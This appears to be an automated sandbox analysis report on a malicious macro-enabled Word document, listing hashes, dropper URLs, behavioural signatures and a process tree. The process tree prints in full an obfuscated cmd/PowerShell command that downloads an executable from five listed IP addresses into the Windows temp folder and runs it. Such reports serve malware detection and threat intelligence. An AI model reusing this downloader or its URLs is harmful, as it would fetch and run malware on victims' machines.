Analysis

  • max time kernel
    149s
  • max time network
    193s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    16-06-2022 03:27

General

  • Target

    27bfe27a4f0fe8da3fabaca074cb4d3982f3b117c4d402afc6ca148eceff80be.docm

  • Size

    95KB

  • MD5

    2f38493885e8008f32c048958a2cdeda

  • SHA1

    3b623b3085213362add7008af21248c134090386

  • SHA256

    27bfe27a4f0fe8da3fabaca074cb4d3982f3b117c4d402afc6ca148eceff80be

  • SHA512

    694a02475c24786524388034b2501ea571d541a58c77ebc5b3066526ea3ea2e50829fd1f0270cfc452f30dacbd051834fb1053c8c92775bb1971725fc95071d0

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://13.114.230.250/QV2skGqtTw

exe.dropper

http://13.52.104.41/Igfq6xv5xo

exe.dropper

http://13.127.212.245/3LwnZ1t8

exe.dropper

http://206.189.181.0/Xht8nvYWZg

exe.dropper

http://115.66.127.67/JS9zvxk1i

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\27bfe27a4f0fe8da3fabaca074cb4d3982f3b117c4d402afc6ca148eceff80be.docm" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2692
    • \??\c:\windows\system32\cmd.exe
      c:\windows\system32\cmd /c set _xxx=p&& set _yyy=owersh&& set _zzz=ell&& call %_xxx%%_yyy%%_zzz% $rHOUDnJ = '$ADWf3i = new-obj0-93413080-468166100ect -com0-93413080-468166100obj0-93413080-468166100ect wsc0-93413080-468166100ript.she0-93413080-468166100ll;$Z8EiF = new-object sys0-93413080-468166100tem.net.web0-93413080-468166100client;$tkmgSjln2 = new-object random;$zJurOI4 = \"0-93413080-468166100h0-93413080-468166100t0-93413080-468166100t0-93413080-468166100p0-93413080-468166100://13.114.230.250/QV2skGqtTw,0-93413080-468166100h0-93413080-468166100t0-93413080-468166100t0-93413080-468166100p0-93413080-468166100://13.52.104.41/Igfq6xv5xo,0-93413080-468166100h0-93413080-468166100t0-93413080-468166100t0-93413080-468166100p0-93413080-468166100://13.127.212.245/3LwnZ1t8,0-93413080-468166100h0-93413080-468166100t0-93413080-468166100t0-93413080-468166100p0-93413080-468166100://206.189.181.0/Xht8nvYWZg,0-93413080-468166100h0-93413080-468166100t0-93413080-468166100t0-93413080-468166100p0-93413080-468166100://115.66.127.67/JS9zvxk1i\".spl0-93413080-468166100it(\",\");$qTPCWnKa = $tkmgSjln2.nex0-93413080-468166100t(1, 65536);$pWKbd = \"c:\win0-93413080-468166100dows\tem0-93413080-468166100p\103.ex0-93413080-468166100e\";for0-93413080-468166100each($Q4omsE06 in $zJurOI4){try{$Z8EiF.dow0-93413080-468166100nlo0-93413080-468166100adf0-93413080-468166100ile($Q4omsE06.ToS0-93413080-468166100tring(), $pWKbd);sta0-93413080-468166100rt-pro0-93413080-468166100cess $pWKbd;break;}catch{}}'.replace('0-93413080-468166100', $IUZAe);$Vp4Qn = '';iex($rHOUDnJ);
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:5072
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $rHOUDnJ = '$ADWf3i = new-obj0-93413080-468166100ect -com0-93413080-468166100obj0-93413080-468166100ect wsc0-93413080-468166100ript.she0-93413080-468166100ll;$Z8EiF = new-object sys0-93413080-468166100tem.net.web0-93413080-468166100client;$tkmgSjln2 = new-object random;$zJurOI4 = \"0-93413080-468166100h0-93413080-468166100t0-93413080-468166100t0-93413080-468166100p0-93413080-468166100://13.114.230.250/QV2skGqtTw,0-93413080-468166100h0-93413080-468166100t0-93413080-468166100t0-93413080-468166100p0-93413080-468166100://13.52.104.41/Igfq6xv5xo,0-93413080-468166100h0-93413080-468166100t0-93413080-468166100t0-93413080-468166100p0-93413080-468166100://13.127.212.245/3LwnZ1t8,0-93413080-468166100h0-93413080-468166100t0-93413080-468166100t0-93413080-468166100p0-93413080-468166100://206.189.181.0/Xht8nvYWZg,0-93413080-468166100h0-93413080-468166100t0-93413080-468166100t0-93413080-468166100p0-93413080-468166100://115.66.127.67/JS9zvxk1i\".spl0-93413080-468166100it(\",\");$qTPCWnKa = $tkmgSjln2.nex0-93413080-468166100t(1, 65536);$pWKbd = \"c:\win0-93413080-468166100dows\tem0-93413080-468166100p\103.ex0-93413080-468166100e\";for0-93413080-468166100each($Q4omsE06 in $zJurOI4){try{$Z8EiF.dow0-93413080-468166100nlo0-93413080-468166100adf0-93413080-468166100ile($Q4omsE06.ToS0-93413080-468166100tring(), $pWKbd);sta0-93413080-468166100rt-pro0-93413080-468166100cess $pWKbd;break;}catch{}}'.replace('0-93413080-468166100', $IUZAe);$Vp4Qn = '';iex($rHOUDnJ);
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2760

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2692-144-0x00007FFEAAFD0000-0x00007FFEAAFE0000-memory.dmp

    Filesize

    64KB

  • memory/2692-132-0x00007FFEAAFD0000-0x00007FFEAAFE0000-memory.dmp

    Filesize

    64KB

  • memory/2692-131-0x00007FFEAAFD0000-0x00007FFEAAFE0000-memory.dmp

    Filesize

    64KB

  • memory/2692-133-0x00007FFEAAFD0000-0x00007FFEAAFE0000-memory.dmp

    Filesize

    64KB

  • memory/2692-134-0x00007FFEAAFD0000-0x00007FFEAAFE0000-memory.dmp

    Filesize

    64KB

  • memory/2692-135-0x00007FFEA8770000-0x00007FFEA8780000-memory.dmp

    Filesize

    64KB

  • memory/2692-136-0x00007FFEA8770000-0x00007FFEA8780000-memory.dmp

    Filesize

    64KB

  • memory/2692-147-0x00007FFEAAFD0000-0x00007FFEAAFE0000-memory.dmp

    Filesize

    64KB

  • memory/2692-130-0x00007FFEAAFD0000-0x00007FFEAAFE0000-memory.dmp

    Filesize

    64KB

  • memory/2692-138-0x00000221F5140000-0x00000221F5144000-memory.dmp

    Filesize

    16KB

  • memory/2692-146-0x00007FFEAAFD0000-0x00007FFEAAFE0000-memory.dmp

    Filesize

    64KB

  • memory/2692-145-0x00007FFEAAFD0000-0x00007FFEAAFE0000-memory.dmp

    Filesize

    64KB

  • memory/2760-139-0x0000000000000000-mapping.dmp

  • memory/2760-142-0x00007FFEBF8B0000-0x00007FFEC0371000-memory.dmp

    Filesize

    10.8MB

  • memory/2760-141-0x00007FFEBF8B0000-0x00007FFEC0371000-memory.dmp

    Filesize

    10.8MB

  • memory/2760-140-0x00000232E8B90000-0x00000232E8BB2000-memory.dmp

    Filesize

    136KB

  • memory/5072-137-0x0000000000000000-mapping.dmp